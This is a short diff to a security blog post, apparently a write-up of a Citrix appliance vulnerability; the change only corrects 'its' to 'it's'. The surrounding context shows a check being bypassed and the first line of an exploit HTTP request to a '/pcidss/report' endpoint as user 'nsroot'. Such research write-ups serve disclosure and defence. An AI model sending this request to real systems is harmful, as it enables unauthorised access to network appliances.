dmaasland/dmaasland.github.io/posts/citrix.md

 }
 ```

 Ha!
 That returns `FALSE` in our case.
 So we pass the check!
-Here's all of this in one HTTP request (the cookie value can be whatever, as long as its a 32 character hex string):
+Here's all of this in one HTTP request (the cookie value can be whatever, as long as it's a 32 character hex string):

 ```http
 POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1